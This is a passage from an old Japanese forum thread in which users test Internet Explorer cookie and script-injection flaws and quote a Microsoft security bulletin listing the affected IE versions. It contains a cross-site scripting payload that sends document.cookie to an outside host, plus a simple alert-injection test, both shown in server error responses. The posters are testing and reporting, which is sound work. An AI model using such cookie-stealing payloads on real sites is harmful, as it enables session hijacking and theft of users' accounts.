簡易表示するのチェックを外してみたところ、 Bad Request Your browser sent a request that this server could not understand. Invalid URI in request GET /../%3CSCRIPT%3E{location.href=%27http://www.2ch.net/?%27+document.cookie}%3C/SCRIPT%3E HTTP/1.1 となった。ネスケでは後日やってみます。 IEは5.01SP2です。
17 :
セキュリティホール memo http://www.st.ryukoku.ac.jp/~kjm/security/memo/ の MS01-055: Cookie Data in IE Can Be Exposed or Altered Through Script Injection (セキュリティアンテナ, 2001.11.09)にあるデモ http://www.solutions.fi/index.cgi/extra_iebug?lang=eng でamazon.co.jpを読むと(事前にamazon.co.jpのcookieを取り込んである) MSIE cookie vulnerability test page This page displays the cookies found on your browser for site amazon.co.jp: Cookies: No cookies found for site... Click here to make new search for cookies. −−−−− アクティブスクリプトに対して「プロンプトを表示」で表示されたら はい(Y)を選択する。 こんなダイアログ−http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/ie6-script-dialog.png −−−−− アクティブスクリプトを実行しなければ "; document.location=url; と表示される。 −−−−− デモが表示された後、「戻る」と 警告: ページの有効期限切れ 要求したページは、フォームで送信された情報を使用して作成されました。このページは、もう利用できません。セキュリティ保護のため、情報は自動的には再送信されません。 情報を再送信し、この Web ページを表示するには、ツール バーの [更新] ボタンをクリックしてください。 となる。
http://pc.2ch.net/../<SCRIPT>alert('hello')</SCRIPT> Bad Request Your browser sent a request that this server could not understand. Invalid URI in request GET /../%3CSCRIPT%3Ealert('hello')%3C/SCRIPT%3E HTTP/1.0 −−−−− HTTP/1.0となっている。 16は1.1だが。
ローカル HTML リソースに存在するクロスサイト スクリプティングの脆弱性。 カスケード スタイル シートのサポートを提供する HTML オブジェクトの使用に関連する情報の漏えいの脆弱性。 Cookie 内のスクリプト処理に関連する情報の漏えいの脆弱性。 ゾーン偽装の脆弱性。 マイクロソフト セキュリティ情報 MS01-058 で説明されている 「Content-Disposition」 の脆弱性の 2 つの変種。 概要 : このセキュリティ情報の対象となるユーザー : MicrosoftR Internet Explorer を使用しているお客様 脆弱性の影響 : 6 つの新しい脆弱性。最も深刻な脆弱性については、攻撃者の選択したコードが 実行される可能性があります。 最大深刻度 : 高 推奨する対応策 : Internet Explorer の影響を受けるバージョンを使用しているお客様は直ちに この修正プログラムをインストールして下さい。 影響を受けるソフトウェア : Microsoft Internet Explorer 5.01 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 6